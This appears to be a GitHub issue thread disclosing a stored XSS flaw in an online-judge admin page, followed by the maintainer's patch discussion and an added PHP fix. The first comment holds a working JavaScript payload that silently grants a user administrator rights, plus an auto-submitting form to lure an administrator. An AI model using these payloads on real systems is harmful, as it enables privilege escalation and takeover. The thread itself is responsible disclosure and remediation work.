
XSS Vulnerability in /admin/problem_judge.php #866

Closed
rolemee opened this issue Sep 29, 2022 · 6 comments · Fixed by #868

Comments

rolemee commented Sep 29, 2022

Describe the bug
An XSS vulnerability exists in

echo $row['input_text']."\n";

How to reproduce
Steps to reproduce the behavior:

  1. POST text with an XSS script to submit.php, for example:
id=-1000&language=1&source=asdasdasdasdasd&input_text=<script src="/template/bs3/jquery.min.js"></script><script>$.get("/admin/privilege_add.php").done(function(data){
    re=/name="postkey" value="([\w]%2B?)"/g;
    $.post("/admin/privilege_add.php",{"postkey":re.exec(data)[1],"user_id":"username","rightstr":"administrator","valuestr":"true"
                                  ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)})
})
</script>

Then you can get a sid.

  2. Send malicious links to administrators, for example:
<body>
<script type="text/javascript">
    function post(URL, PARAMS) {
    var temp = document.createElement("form");
    temp.action = URL;
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
        var opt = document.createElement("textarea");
        opt.name = x;
        opt.value = PARAMS[x];
        temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    return temp;
}
post("http://192.168.0.25:8080/admin/problem_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})

</script>
</body>

zhblue (Owner) commented Sep 29, 2022

Thank you very much for reporting this.
Will this patch work around it?
c15d370

rolemee (Author) commented Sep 29, 2022

Although repairing it in this way can prevent XSS, it will cause some business problems. I recommend repairing it like #867.

zhblue (Owner) commented Sep 29, 2022

No, this will not cause business problems, because these inputs should be treated as TEXT from the beginning.
Only the HTTP_JUDGER will use it as an API port for downloading TEXT input for a once-only test run.

zhblue (Owner) commented Sep 29, 2022

Still, it's marvelous work you've done!
Thank you very much for helping!

rolemee (Author) commented Sep 29, 2022

I made a mistake, this change can defend against XSS.

rolemee (Author) commented Sep 30, 2022

@zhblue
However, other files will also have XSS vulnerabilities.
For example:

}else if(isset($_POST['getsolution'])){
    $sid=intval($_POST['sid']);
    $sql="SELECT source FROM source_code WHERE solution_id=? ";
    $result=pdo_query($sql,$sid);
    if ( $row=$result[0]){
        echo $row['source']."\n";
    }

}else if(isset($_POST['getcustominput'])){
    $sid=intval($_POST['sid']);
    $sql="SELECT input_text FROM custominput WHERE solution_id=? ";
    $result=pdo_query($sql,$sid);
    if ( $row=$result[0]){
        echo $row['input_text']."\n";
    }
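The root cause in both the original report (the `getcustominput` branch echoing `input_text`) and the two branches quoted in the comment above is the same: a user-supplied string is echoed into a response whose default content type is HTML, so an administrator's browser tricked into loading that response will execute it. The example below is written for this page to illustrate the point zhblue makes (the endpoint serves TEXT to the judger, not HTML to a browser); it is not the project's own code and not the patch in c15d370, #867 or #868. It assumes `pdo_query($sql, ...$params)` is the project's query helper returning rows as associative arrays, as the snippet above uses it.

```php
<?php
// Added example, not the project's own code. Hardened handling of the
// "getsolution" / "getcustominput" branches: the stored text is sent
// back as text/plain with MIME sniffing disabled, so a browser that is
// lured into loading this URL displays the bytes instead of executing
// them. The judger that fetches the data as an API client is unaffected.
//
// Assumption: pdo_query($sql, ...$params) exists in the project and
// returns an array of associative rows (as used in the issue).

function send_as_plain_text(string $body): void
{
    // Declare the body as text: <script> inside a text/plain response is
    // never executed, whatever the content looks like.
    header('Content-Type: text/plain; charset=utf-8');
    // Stop older browsers from "upgrading" text/plain to text/html.
    header('X-Content-Type-Options: nosniff');
    echo $body, "\n";
}

function html_escape(string $s): string
{
    // Use this instead if the value must be embedded inside an HTML page
    // (e.g. shown in the admin UI): neutralises <, >, ", ' and &.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function handle_solution(int $sid): void
{
    $result = pdo_query("SELECT source FROM source_code WHERE solution_id=?", $sid);
    // isset() avoids an "undefined offset" notice when no row matches.
    if (isset($result[0])) {
        send_as_plain_text($result[0]['source']);
    }
}

function handle_custom_input(int $sid): void
{
    $result = pdo_query("SELECT input_text FROM custominput WHERE solution_id=?", $sid);
    if (isset($result[0])) {
        send_as_plain_text($result[0]['input_text']);
    }
}

// Dispatch mirrors the structure of the original branches; intval() keeps
// the SQL parameter numeric, the prepared statement handles the rest.
if (isset($_POST['getsolution'])) {
    handle_solution(intval($_POST['sid']));
} elseif (isset($_POST['getcustominput'])) {
    handle_custom_input(intval($_POST['sid']));
}
```

Either approach removes the script execution: `send_as_plain_text` addresses the API-style use described in the thread, while `html_escape` is the right tool when the same value is rendered inside an HTML admin page. A reviewer checking the fix can confirm it by requesting the endpoint with a stored `<script>` payload and verifying that the response carries `Content-Type: text/plain` and `X-Content-Type-Options: nosniff`.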
